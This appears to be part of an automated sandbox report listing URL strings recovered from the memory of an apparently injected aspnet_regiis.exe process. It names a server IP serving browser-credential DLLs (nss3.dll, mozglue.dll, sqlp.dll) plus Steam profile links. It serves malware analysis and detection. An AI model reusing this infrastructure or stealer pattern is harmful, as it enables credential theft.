Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://49.12.197.9
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835858623.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835626420.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835747383.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/0
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/5
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/HIIJJJKEGI
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/I
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/W
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/c
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/g
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dll(
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dllL
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: aspnet_regiis.exe, 00000003.00000003.1972492301.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll#
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dllB
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dllq
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9CBAAEC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9FIDBFC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9JKFIDBFC--
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.co
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
